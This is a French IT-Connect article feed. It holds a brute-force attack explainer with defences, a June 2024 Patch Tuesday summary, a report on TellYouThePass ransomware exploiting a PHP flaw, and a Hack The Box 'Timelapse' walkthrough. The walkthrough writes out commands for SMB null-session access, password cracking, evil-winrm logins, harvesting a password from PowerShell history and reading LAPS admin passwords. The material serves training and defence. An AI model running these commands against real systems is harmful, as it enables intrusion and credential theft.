I. Présentation

Dans cet article, nous allons nous intéresser aux attaques par brute force qui peuvent être menées sur les comptes utilisateurs d'un Active Directory, d’une application web ou de tout autre service réseau.

Nous verrons en quoi consistent ces attaques et quel est le but recherché par l'attaquant, nous parcourrons les différents types de brute force qui existent et peuvent être exploités lors d'une cyberattaque en fonction de l’objectif et du niveau de discrétion recherchés. Nous aborderons enfin les principales mesures à prendre pour s'en protéger.

II. Qu'est-ce qu'une attaque par brute force ?

Une attaque par brute force, appelée aussi "bruteforce attack" ou attaque par force brute, consiste pour un attaquant à tenter d’obtenir les identifiants d’un compte utilisateur en essayant une multitude de mots de passe sur un même login. Une telle attaque se caractérise surtout par le nombre d’essais que l’attaquant va réaliser afin de tenter de compromettre un compte. Le plus souvent, il va utiliser des dictionnaires de mots de passe (appelés “wordlist”), composés de plusieurs milliers ou millions de lignes, chacune étant un mot de passe potentiel.

Dans le cadre d'une cyberattaque, l'attaquant va utiliser le brute force afin de compromettre facilement des comptes utilisateurs qui possèdent un mot de passe faible. Cette opération peut être menée en tant que première étape d'une intrusion (par exemple, sur les services de l'entreprise exposés sur Internet) ou alors en visant des services internes à l'entreprise après une première compromission.

Un “identifiant” étant composé d’un login (nom d'utilisateur) et d’un mot de passe, le fait de connaître le login est déjà une information intéressante pour un attaquant, puisqu’il va déjà être en possession de 50% de l’information nécessaire à la compromission d’un compte.

Plus concrètement pour compromettre le compte ayant le login "admin", un attaquant va essayer le couple “admin : password”, puis “admin : admin”, puis “admin : superMDP123!”, etc. Pour qu’une attaque digne de ce nom soit menée, l’attaquant automatisera le processus grâce à des programmes conçus pour ce genre d’opérations et adaptés au contexte (application web, service SSH, SMB, etc.), lui permettant de réitérer son opération d'authentification rapidement et sans effort.

Imaginez avoir en énorme trousseau de clés en main et une serrure verrouillée en face de vous. Le fait de tester toutes les clés une à une est précisément la définition d'un brute force.

Certains outils permettent aujourd’hui de tenter des milliers de combinaisons par seconde depuis un simple ordinateur. Parmi ces outils, on peut notamment citer “hydra”, “netexec” ou “metasploit”.

Le brute force est une technique d’attaque connue et fréquemment utilisée. Elle est référencée dans le framework MITRE ATT&CK sous le TTP T1110 :

• MITRE ATT&CK : T1110 – Brute Force

Cette page vous permettra notamment de trouver de nombreux cas réels d’utilisation du brute force dans des attaques étatiques ou d’envergures :

Par exemple, les attaques par brute force font partie de la méthodologie du groupe APT29 (groupe d’espionnage affilié à la Russie et ciblant les pays de l’OTAN) d’après le framework MITRE ATT&CK :

• MITRE ATT&CK – APT 29

III. Les différents types d’attaques par brute force

A. Le brute force "classique"

La plupart du temps, une attaque par brute force va cibler plusieurs comptes utilisateur, cela afin de maximiser les chances de trouver un compte ayant un mot de passe faible. L’attaquant disposera alors d’une wordlist de login (vérifiés ou potentiels) et d’une wordlist de mots de passe. Il va donc tenter chaque combinaison “login : mot de passe” :

Dans les faits, les attaque par brute force peuvent cibler tout service ou application utilisant le login et le mot de passe comme facteurs d’authentification et étant insuffisamment protégé. Cela concerna donc aussi bien les applications web et leur page de login classique, les services SSH ou encore au sein d’un système d’information l’Active Directory, qui propose à lui seul de nombreux services permettant une authentification (Kerberos, SMB, RPC, LDAP, WinRM, RDP, etc.) et joue, entre autres, le rôle d'autorité d'authentification au sein d'un domaine.

Il faut ici se représenter le nombre de tentatives d’authentification que génère ce type d’attaque. Si je dispose d’une liste de 100 logins sur lesquels je souhaite tester 20 000 mots de passe. Cela signifie que mon attaque va générer 2 millions de tentatives d’authentification.

Pour être plus précis, ce type de brute force est décrit le framework MITRE ATT&CK en tant que "Bruteforce: password guessing", car l'on tente de deviner le mot de passe d'un utilisateur de façon agressive :

• T1110.00 - Bruteforce: Password Guessing

B. Le brute force ciblé

Il existe également des cas où l’attaquant va vouloir cibler un compte bien identifié, on parle alors d’attaque ciblée. Ce cas de figure s’observe notamment quand l’attaquant a identifié un compte particulièrement sensible ou hautement privilégié.

Également, ces attaques sont utilisées lorsque les services ou applications utilisent encore un compte d’administration par défaut. Par exemple, le compte “admin” d’une application web qui est le premier compte existant sur toutes les instances de celle-ci. On peut également mentionner le compte “administrateur/administrator” dans les environnements Windows (local ou au niveau du domaine).

Lors d’une attaque par brute force ciblée, l’attaquant ne va cibler qu’un seul (ou un nombre réduit) compte utilisateur, mais toujours utiliser un dictionnaire de mot de passe. Il mise alors sur le fait que ce compte précis possède un mot de passe faible, présent dans sa wordlist :

Ce type d’attaque génère naturellement moins de requêtes (cela dépend toujours du dictionnaire de mot de passe utilisé), mais n’en est pas moins efficace si le compte ciblé possède effectivement un mot de passe faible. Voici la démonstration d’une attaque par brute force ciblée sur un service SMB dans un environnement Windows Active Directory, le compte ciblé est toujours le même “IT-CONNCET.TECH\KATY_CRAFT”, mais le mot de passe change à chaque essai :

Comme vous le voyez dans cet exemple, l’outil utilisé va tenter plusieurs mots de passe et cibler le compte “IT-CONNECT.TECH\KATY_CRAFT”, jusqu’à trouver la bonne combinaison.

C. Le password spraying

Un troisième type d’attaque par brute force existe et est notamment utilisée dans le cadre des intrusions en environnement Active Directory : le password spraying.

Cette attaque consiste à tenter de s’authentifier sur de multiples comptes à l’aide d’un seul mot de passe (ou une liste très réduite de mots de passe). Le cas le plus parlant est celui où l’attaquant parvient à obtenir le fameux “premier mot de passe par défaut” qu’un administrateur peut assigner à chaque nouvel utilisateur et qu’il doit changer au plus vite, un mot de passe en général très complexe tel que “Bienvenue01.” ou “ChangezMoi!”.

En tombant sur de tels mots de passe, un attaquant peut se dire que d’autres comptes, nouvellement créés ou jamais utilisés, ont également ce mot de passe, il va donc tenter de s’authentifier sur chaque compte de l’Active Directory avec celui-ci.

Pour un attaquant, le password spraying possède un grand avantage : il évite le blocage de compte.

En effet, par défaut, certains mécanismes sont présents en environnement Active Directoy (et aussi sur certains services et applications web) et consistent à verrouiller temporairement un compte utilisateur ayant subi de trop nombreuses tentatives d’authentification infructueuses. Dès lors, les attaques de type brute force classique vont avoir pour effet de bloquer tous les comptes, ce qui bloquera l'attaque, mais perturbera les utilisateurs, et donc lèvera l’alerte.

Via le password spraying, aucun risque de blocage. Cette opération va donc utiliser un dictionnaire d’utilisateurs là où l’attaque par brute force classique va utiliser un dictionnaire de mots de passe.

Pour une description plus formelle, je vous oriente vers le TTP du MITRE dédié à ce type d’attaque :

• MITRE ATT&CK - T1110.003 - Bruteforce: Password Spraying

D. Autres techniques dérivées

Bien sûr, d’autres méthodologies plus subtiles existent dans ce contexte des attaques par brute force. Il existe, par exemple, des listes de login “communs” qui sont susceptibles d’être présents sur tous les gros Active Directory d’entreprise. Un ensemble de listes que j’utilise fréquemment et qui donne de bons résultats est situé sur ce dépôt Github :

• Github – InsideTrust/Statistically likely usernames

Si vous avez déjà travaillé sur de gros Active Directory, il y a fort à parier que des comptes avec des logins tels que ceux-ci existent dans votre Active Directory :

• svc-backup
• ldapsvc
• formateur
• accueil
• imprimante
• scan
• etc.

Dès lors, et sans connaissance d’aucun login valide, un attaquant peut utiliser ce genre de dictionnaire pour tenter des attaques en “user as pass”, c’est-à-dire ciblant des comptes qui ont un login “commun” ainsi qu’un mot de passe égal à leur login (exemple “scan:scan”).

Dans ces cas de figure, l’attaquant tente un mot de passe par login également, mais avec un mot de passe “différent” (car dépendant du login utilisé).

Cela peut paraître totalement absurde, mais c’est loin d’être rare et c’est généralement un moyen très rapide et simple d’obtenir un premier accès authentifié à un Active Directory. On peut également retrouver ce type d’opérations dans un contexte web visant des services et applications/frameworks connus. Il existe, par exemple, des listes de couples login/mot de passe connus pour l’accès à un Tomcat Manager qui serait un peu trop exposé, ou d'autres contenant des identifiants fréquemment utilisés pour les services SSH (“root:root”, “root:toor”, etc.)

IV. Où l’attaquant trouve-t-il des mots de passe ?

On peut naturellement se poser la question de la provenance des dictionnaires de mots de passe utilisés par les attaquants lors d’un brute force. Comment l’attaquant choisit les mots de passe qu’il va tenter ?

Nous avons vu qu'une attaque par brute force, l’attaquant se constitue donc une liste de logins à partir de différentes sources, puis il utilisera des dictionnaires de mots de passe déjà constitués. Ces dictionnaires de mots de passe sont la plupart du temps récupérés publiquement. Il existe des dépôts GitHub publics qui référencent de nombreuses wordlist, la plupart étant issues :

• D’un travail de référencement des mots de passe par défaut d’application web, d’équipements en tout genre (switch, routeur) ou de services (mssql, mysql, etc.).
• De fuites de données dont le contenu finit par être publié sur Internet (cas de l’entreprise Rockyou, dont la fuite de données à entrainé la création d'une wordlist contenant 14 344 391 mots de passe).

Voici, en exemple, l’un des dépôt GitHub les plus connus :

• GitHub – danielmiessler/SecLists/Passwords

D'autres sources de liste de mots de passe existent, dont certaines totalement illégales. On peut notamment mentionner les sites qui proposent l'achat du contenu des fuites de données récentes.

Pour des attaques plus précises, l’attaquant peut lui-même construire sa propre wordlist en fonction de son contexte d’attaque. Il utilisera alors une base de mots probables (nom de l’entreprise, nom et numéro de département) ainsi que des outils comme "hashcat" ou "johntheripper", qui permettent de construire des dérivés de mots de passe ("IT-Connect" deviendra "IT-C0nnect", "IT-Connect01!", "ItConnect2024!", etc.) à partir d’une liste initiale. Voici un exemple :

III. Comment se protéger d'une attaque par brute force ?

A. Politique de mot de passe

La première et principale mesure à prendre afin de se protéger des attaques par bruteforce est de renforcer la robustesse de tous les mots de passe. Il convient de mettre en place une politique de mot de passe robuste afin de limiter les chances de succès d’une attaque par brute force basée sur des mots de passe triviaux. Plus les mots de passe sont longs et aléatoires, moins un attaquant aura de chance de les découvrir via ce type d’attaque.

Je vous oriente vers le guide de l’ANSSI sur le sujet pour définir une politique de mot de passe efficace :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe
• Active Directory : comment configurer une stratégie de mots de passe affinée ?
• Utiliser des passphrases à la place des mots de passe

En plus des éléments habituels que sont la longueur, la complexité et le nombre d’alphabets utilisés, la politique doit aussi s’assurer que, dans son mot de passe, l’utilisateur n’utilise pas de mots issus d’informations “publiques” (son nom, nom d’un proche, nom de l’entreprise, d’un projet, région, lieu de vacances de l’année dernière…). Pour cela, différentes techniques et outils existent en fonction des contextes. On peut notamment citer :

• Azure AD Password Protection : IT-Connect - Active Directory : configuration d’Azure AD Password Protection on-premise
• L’outil Specops Password Policy : IT-Connect - Active Directory : améliorez la gestion des mots de passe avec Specops Password Policy
• Il peut aussi être envisagé des contrôles d’entropie, notamment dans le cadre d’application web.

Attention, il ne faut pas oublier que la politique de mot de passe doit être appliquée à la création d’un compte, mais aussi lors des phases de changement de mot de passe.

B. Politique de verrouillage/quota

Nous avons vu que la politique de verrouillage a aussi son importance. Celle-ci permet de définir le seuil de verrouillage d’un compte, mais aussi la durée du verrouillage et la fenêtre de temps observation.

Grâce à ces paramètres, il est possible de grandement ralentir l’opération de l’attaquant, voire de le détecter si un pic de verrouillage de compte est observé. Attention toutefois aux effets de bords (blocage d’un grand nombre de comptes utilisateur). À nouveau, je vous invite à lire notre article sur le sujet :

• IT-Connect - Active Directory et le verrouillage des comptes

Ces politiques de verrouillage de compte peuvent parfois plutôt prendre la forme d’un quota ou d’un bannissement temporaire d’IP. C’est notamment le cas pour les applications web exposées sur Internet. Dans de tels cas, un attaquant pourrait très facilement exploiter la politique de verrouillage des comptes afin de bloquer temporairement ou définitivement (en fonction de sévérité de la politique) les comptes utilisateurs de la plateforme visée.

Il est, en effet, tout à fait envisageable pour un attaquant d’atteindre le seuil de verrouillage pour un compte qu’il sait existant sur l’application web visée afin de rendre indisponible l’application pour le ou les utilisateurs ciblés. Puis, de recommencer son opération de blocage dès que le verrouillage aura expiré, entraînant de fait un déni de service.

Pour empêcher cette exploitation du seuil de verrouillage, il est en général préféré de bannir l’adresse IP de l’attaquant ou de n’autoriser une même adresse IP à faire uniquement quelques requêtes d’authentification par minute.

C. Authentification multifacteurs

La troisième principale méthode pour se protéger des attaques par brute force est de faire en sorte que la connaissance du mot de passe ne suffise pas à se connecter à un compte. On y ajoutera alors un second facteur d’authentification, comme un OTP (One Time Password) envoyé par SMS, e-mail ou via une application spécialisée sur smartphone.

En fonction de la réponse du service visé, l’attaquant pourra certainement savoir si le mot de passe tenté est correct (redirection vers la phase “second facteur”), mais cette information ne sera pas suffisante pour compromettre les comptes ciblés.

Pour aller plus loin, je vous recommande vivement de consulter l’excellent document de l’ANSSI à ce sujet :

• ANSSI - Recommandations relatives à l'authentification multifacteur et aux mots de passe

VI. Conclusion

Dans cet article, nous avons vu ce que sont les attaques par brute force et dans quel but elles sont utilisées lors d’une cyberattaque, que ce soit dans un environnement Active Directory, une application web ou tout autre service réseau dont la sécurité repose sur le couple login/mot de passe.

Nous avons également vu les principaux moyens de protection des comptes utilisateurs contre ces attaques. Pour aller plus loin, il faudrait s’intéresser au moyen de détection d’une telle attaque, mais cela dépend beaucoup de l’environnement ciblé et sera différent, qu’il s’agisse d’un service SSH isolé, d’une application web, ou d’une opération ciblant les comptes d’un Active Directory.

Dans tous les cas, un élément commun sera à utiliser : les journaux d’évènements, leur bonne configuration, leur centralisation et leur surveillance active !

N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord !

The post L’essentiel sur les attaques brute force : principes, types d’attaques et mesures de protection first appeared on IT-Connect.

Le Patch Tuesday de Juin 2024 a été publié par Microsoft ! Il inclut des correctifs de sécurité pour 51 vulnérabilités ainsi qu'une faille de sécurité zero-day déjà connue avant la publication de ce patch. Faisons le point.

Ce mardi 11 juin 2024, Microsoft a publié un Patch Tuesday relativement léger en comparaison des mois précédents. L'entreprise américaine a corrigé des failles de sécurité dans plusieurs services Azure (Monitor, File Sync, etc.), mais aussi dans la suite Office (Outlook, Word, notamment), dans Visual Studio, le rôle Serveur DHCP, dans la fonction DFS, ainsi que dans différents composants de Windows y compris le noyau du système d'exploitation.

Pour en savoir plus sur les mises à jour pour Windows 10 et Windows 11 :

• Mise à jour Windows 10 de juin 2024 (KB5039211)
• Mise à jour Windows 11 de juin 2024 (KB5039212)

Une seule faille de sécurité critique : CVE-2024-30080

Ce Patch Tuesday corrige une seule faille de sécurité critique, associée à la référence CVE-2024-30080, présente dans Microsoft Message Queuing (MSMQ).

Elle permet une exécution de code à distance, comme l'explique Microsoft : "Pour exploiter cette vulnérabilité, un attaquant doit envoyer un paquet MSMQ malveillant spécialement conçu à un serveur MSMQ. Cela pourrait entraîner l'exécution de code à distance du côté du serveur." - Le service de Message Queuing écoute sur le port 1801/TCP lorsqu'il est actif sur une machine.

Elle affecte Windows 10, Windows 11 ainsi que toutes les versions de Windows Server à partir de Windows Server 2008.

CVE-2023-50868 - DNSSEC : déni de service sur les serveurs DNS

Déjà connue publiquement, la faille de sécurité CVE-2023-50868 n'est pas exploitée dans le cadre de cyberattaques (à ce jour). Il s'agit d'une vulnérabilité présente dans DNSSEC et plus précisément dans le mécanisme NSEC3 (utilisé pour les preuves de non-existence d'un enregistrement DNS). En exploitant cette faiblesse, un attaquant peut causer un déni de service grâce à l'augmentation de la charge CPU sur la machine ciblée, en l'occurrence un résolveur DNS.

Cette vulnérabilité affecte Windows Server 2012 et les versions supérieures, y compris les installations en mode "Core", où le rôle de serveur DNS est installé. En fait, cette faille de sécurité n'est pas liée à Windows Server mais à DNSSEC, donc les autres implémentations de serveurs DNS, y compris sur Linux, sont affectées. Pour en savoir plus, vous pouvez consulter cette page.

Source

The post Patch Tuesday – Juin 2024 : 51 failles de sécurité et 1 zero-day corrigées par Microsoft ! first appeared on IT-Connect.

Le gang de ransomware TellYouThePass exploite activement la faille de sécurité critique découverte dans PHP ! Grâce à cette vulnérabilité, ils peuvent déployer un webshell et l'utiliser pour exécuter un payload pour chiffrer les données du système compromis ! Faisons le point sur cette menace.

Depuis quelques jours, une faille de sécurité critique présente dans PHP et associée à la référence CVE-2024-4577 a été divulguée et corrigée par les mainteneurs du projet PHP. Présente dans toutes les versions de PHP à partir de la version 5.X, et jusqu'aux branches les plus récentes, cette vulnérabilité permet une exécution de code à distance lorsque PHP est utilisé sur Windows. Si vous souhaitez en savoir plus, retrouvez notre article à ce sujet : PHP - CVE-2024-4577.

Le 6 juin 2024, de nouvelles versions de PHP ont été publiées pour corriger cette vulnérabilité. Moins de 48 heures plus tard, le gang de ransomware TellYouThePass a commencé à lancer ses premières attaques ! D'ailleurs, ce n'est pas la première fois que ce gang de ransomware se montre très réactif pour tenter d'exploiter les vulnérabilités présentes sur les services Web. C'était déjà le cas avec une précédente vulnérabilité dans Apache ActiveMQ ainsi que la fameuse faille de sécurité dans Log4j.

Les chercheurs en sécurité d'Imperva ont mis en ligne un nouveau rapport pour évoquer cette campagne de cyberattaques menée par TellYouThePass. "Les attaquants ont utilisé l'exploit connu pour la CVE-2024-3577 afin d'exécuter un code PHP arbitraire sur le système cible, en s'appuyant sur le code pour utiliser la fonction "system" afin d'exécuter un fichier d'application HTML hébergé sur un serveur web contrôlé par l'attaquant via le binaire mshta.exe.", peut-on lire.

Une fois que la souche malveillante est en place, elle envoie une requête HTTP au serveur C2 des cybercriminels pour notifier l'infection. Afin d'échapper aux systèmes de détection, cette requête se fait passer pour une demande de récupération de ressources CSS. Au passage, l'adresse IP du serveur C2 semble codée en dur dans l'échantillon analysé par les chercheurs en sécurité : 88[.]218.76.13.

L'étape finale : l'exécution du ransomware TellYouThePass

La dernière étape consiste à exécuter le ransomware TellYouThePass sur la machine compromise. Autrement dit, sur le serveur Web Windows compromis par l'intermédiaire de PHP.

Le logiciel malveillant commence par énumérer les répertoires avant de tuer différents processus et de générer les clés de chiffrement afin de commencer à chiffrer les données de la machine. Ceci inclut notamment les données de l'application Web.

Pour finir, une note de rançon représentée par le fichier "READ_ME10.html" est déposée sur la machine, à la racine du répertoire web.

Protégez-vous de cette vulnérabilité dès que possible. D'après un rapport de Censys, en date du 9 juin 2024, il y avait 458 800 serveurs exposés sur Internet et potentiellement vulnérables à cette faille de sécurité.

Source

The post Le ransomware TellYouThePass exploite la faille critique dans PHP pour pirater les serveurs Web ! first appeared on IT-Connect.

I. Présentation

Dans cet article, je vous propose la résolution de la machine Hack The Box Timelapse, de difficulté "Facile". Cet exercice vous montrera un exemple très concret et plutôt réaliste de compromission d'un Active Directory et donc d'un domaine dans un réseau d'entreprise.

Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.

Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs.

Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.

Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".

Technologies abordées	Windows, Powershell, LAPS
Outils utilisés	nmap, smbclient, johntheripper, evil-winrm, openssl, PowerShell

Retrouvez tous nos articles Hack The Box via ce lien :

• IT-Connect - Articles Hack The Box

II. Résolution de la box Timelapse

A. Découverte et énumération

Pour l'instant, nous ne disposons que de l'adresse IP de notre cible. Commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.

Technique d'attaque (MITRE ATT&CK) : T1046 - Network Service Discovery

$ nmap 10.10.11.152 -p- -T5 -Pn
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans

De nombreux services sont exposés et nous pouvons directement distinguer des services propres aux systèmes d'exploitations Windows et même à l'Active Directory (TCP/88).

Retrouvez notre cours complet sur Nmap sur lien suivant :

• IT-Connect - Maîtrisez Nmap pour la cartographie réseau et le scan de vulnérabilités

B. Recherche dans un partage de fichiers

Une première opération à réaliser systématiquement est de vérifier que tous les partages sont bien protégés par une authentification, exemple avec le port TCP/445 (SMB) et l'outil "smbmap" :

Technique d'attaque (MITRE ATT&CK) : T1078.001 - Valid Accounts: Default Accounts

$ smbmap -u "%" -p "" -P 445 -H 10.10.11.152 --no-banner

Voici le retour que l'on peut observer :

Le service SMB accepte les null sessions, on peut donc s'y authentifier et parcourir certains partages de fichier sans connaitre d'identifiants valides. Une rapide découverte des fichiers stockés nous permet de découvrir une archive ".zip" :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Celle-ci est protégée par un mot de passe, nous pouvons utiliser l'outil "zip2john" afin d'extraire le hash de ce mot de passe dans un format que l'outil de cassage "John The Ripper" saura interpréter. Nous pourrons ensuite utiliser cet outil pour tenter de retrouver le mot de passe correspondant à ce hash à l'aide d'une attaque par brute force reposant sur le dictionnaire "rockyou.txt" :

Technique d'attaque (MITRE ATT&CK) : T1110.002 - Brute Force: Password Cracking

$ zip2john winrm_backup.zip > /tmp/zipPasswordHash
$ john /tmp/zipPasswordHash --wordlist=rockyou.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)

L'utilisation d'un mot de passe faible nous permet d'ouvrir l'archive pour en extraire un fichier ".pfx", dont l'accès est également protégé par un mot de passe. Nous pouvons réitérer la même opération sur ce format de fichier (avec "pfx2john") :

$ pfx2john legacyy_dev_auth.pfx > /tmp/pfxPasswordHash
$ john /tmp/pfxPasswordHash --wordlist=rockyou.txt
thuglegacy       (legacyy_dev_auth.pfx) 

Comme vous pouvez le remarquer, l'outil "John The Ripper" va détecter lui-même le format du hash et adapter son cassage de mot de passe en conséquence. Le nom du fichier semble nous indiquer qu'il appartient à l'utilisateur "legacyy".

Maintenant que nous connaissons le mot de passe du fichier ".pfx", qui est un certificat privé, nous pouvons extraire la clé privée et le certificat qu'il contient :

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes 
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

C. Accès winRM et historique PowerShell

Une clé privée est avant tout utilisée pour prouver une identité, c'est-à-dire s'authentifier. Nous pouvons tenter d'utiliser ces informations afin de nous authentifier sur les services exposés de notre cible qui accepte ce mode d'authentification. J'utilise ici l'outil "evil-winrm" afin de m'authentifier sur le service WinRM (TCP/5985) en utilisant la clé privée et le certificat précédemment découvert :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

evil-winrm  --user Legacy -k priv-key.pem -i timelapse.htb -p thuglegacy -S -c certificate.pem
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
a9a2[REDACTED]d351f

Une fois qu'un accès interactif distant est obtenu sur une cible, l'attaquant peut mener de nombreuses opérations pour comprendre où il est sur le réseau, sur le système, quels sont ses droits locaux, à quoi sert le système compromis, etc. Parmi ces opérations figure la vérification de l'historique utilisateur, stocké dans un fichier dans le répertoire de chaque utilisateur dans le cas de PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1083 - File and Directory Discovery

Evil-WinRM* PS C:\Users\legacyy> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

Dans notre cas, l'historique de commande PowerShell nous permet de retrouver un mot de passe en clair saisi lors de sa conversion en objet "SecureString". Nous pouvons également facilement savoir à quel utilisateur il appartient : "svc_deploy". Ce compte peut ensuite être utilisé pour accéder à distance au système à l'aide de la commande "evil-winrm" :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

$ evil-winrm --user svc_deploy -i timelapse.htb -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

D. Élévation de privilège via LAPS_READERS

Nouveau compte, nouvelle énumération. Il nous faut à présent connaitre les droits supplémentaires de ce compte par rapport au compte précédent afin de savoir si celui-ci nous permettra d'aller encore plus loin sur le système. Je liste, par exemple, l'ensemble de mes droits et permissions sur le système d'exploitation via avec la commande ""whoami /all"" :

Technique d'attaque (MITRE ATT&CK) : T1069.002 - Permission Groups Discovery: Domain Groups

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
User Name            SID
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103

GROUP INFORMATION
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group

Cet utilisateur "svc_deploy" fait partie du groupe "TIMELAPSE/LAPS_READERS", il s'agit d'un groupe important qui permet de gérer, et donc lire, les mots de passe LAPS des systèmes du domaine.

Pour en apprendre plus sur ce qu'est LAPS et surtout son apport en termes de sécurité, n'hésitez pas à consulter nos tutoriels à ce sujet :

• Active Directory - Comment configurer Windows LAPS ?
• Intune - Comment configurer Windows LAPS ?

Ce droit très sensible me permet notamment de récupérer le mot de passe de l'administrateur du contrôleur du domaine, opération ici réalisée en PowerShell :

Technique d'attaque (MITRE ATT&CK) : T1555 - Credentials from Password Stores

> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : (z)e;CScAMkY1{C-h{vq8oSb
Name                        : DC01

Avec cette information, nous obtenons les droits de l'utilisateur local "Administrator". Autrement dit, nous avons compromis le contrôleur de domaine, et par extension le domaine lui-même.

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management

*Evil-WinRM* PS C:\Users\Administrator> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\TRX> cat Desktop/root.txt
74d6f[REDACTED]9c2d6

III. Résumé de l'attaque

Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :

TTP (MITRE ATT&CK)	Détails
T1046 - Network Service Discovery	Scan réseau réalisé via nmap pour découvrir les services exposés
T1078.001 - Valid Accounts: Default Accounts	Découverte et utilisation d'un null session sur le service SMB
T1083 - File and Directory Discovery	Recherche de fichiers sensibles dans le partage de fichier via smbmap. Téléchargement d'une archive ZIP
T1110.002 - Brute Force: Password Cracking	Attaque par bruteforce sur un ".zip" chiffré, puis un fichier ".pfx"
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "legacyy" et l'outil "evil-winrm".
T1083 - File and Directory Discovery	Recherche de fichiers sensibles sur le système avec les droits de l'utilisateur "legacyy". Découverte d'un mot de passe dans l'historique PowerShell.
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec le compte "svc-deploy" et l'outil "evil-winrm".
T1069.002 - Permission Groups Discovery: Domain Groups	Découverte des groupes dont est membre "svc-deploy" via PowerShell.
T1555 - Credentials from Password Stores	Récupération du mot de passe de l'administrateur local du contrôleur de domaine via PowerShell
T1021.006 - Remote Services: Windows Remote Management	Accès distant winRM avec les identifiants de l'administrateur local.

IV. Notions abordées

A. Côté attaquant

Le chemin d'attaque de cette box propose la découverte et l'exploitation de vulnérabilité assez classiques et réalistes, notamment concernant l'identification des partages réseau. Il est très fréquent de trouver des partages réseau sur les hôtes d'un système d'information dont certains sont très mal protégés. Cela parfois à cause du "shadow IT", des services montés dans le dos de l'équipe informatique, ou par simple négligence sur un périmètre trop important et difficile à maitriser.

À ce titre, la découverte des partages de fichiers et la recherche d'information sensible aurait également pu être réalisée via Snaffler, qui nous aurait sorti le même résultat.

Pour en apprendre plus sur cet outil puissant, voici notre article sur le sujet :

• IT-Connect - Analysez vos partages de fichiers Active Directory avec Snaffler pour protéger vos données

B. Côté défenseur

Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :

Recommandation n°1 : Nous pouvons ici recommander dans un premier temps de renforcer la politique de mots de passe sur le service SMB notamment en interdisant les null sessions. Le mot de passe utilisé pour protéger l'archive ".zip" et le ".pfx" sont faibles puisqu'ils ont été cassés à l'aide du dictionnaire très classique rockyou.txt. Nous pouvons citer en ressource externe le guide de l'ANSSI sur les mots de passe : Recommandations relatives à l'authentification multifacteur et aux mots de passe.

• IT-Connect - Politique de mot de passe : comment appliquer les bonnes pratiques de l’ANSSI ?
• IT-Connect - Pourquoi faut-il préférer les passphrases aux mots de passe ?

Recommandation n°2 : par extension, il peut être recommandé de vérifier la présence de fichiers sensibles dans les partages réseau, cela pour éviter qu'un utilisateur ou attaquant ne tombe sur des fichiers qu'il n'est pas censé trouver.

Recommandation n°3 : enfin, il peut être recommandé de sensibiliser l'équipe technique à la manipulation des mots de passe, surtout pour éviter qu'ils se retrouvent stockés dans l'historique PowerShell ou ailleurs.

L'élévation de privilège réalisé ici n'a rien d'anormal une fois que l'on a compromis le compte "svc-deploy". On peut s'interroger sur la légitimité de l'appartenance au groupe "LAPS_READERS" mais cela dépends essentiellement du contexte métier et organisationnel. Une fois ce compte compromis, on ne fait finalement qu'une opération légitime : récupérer un attribut auquel les membres de groupe ont accès. Le compte "svc-deploy" a d'ailleurs un mot de passe plutôt correct.

J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!

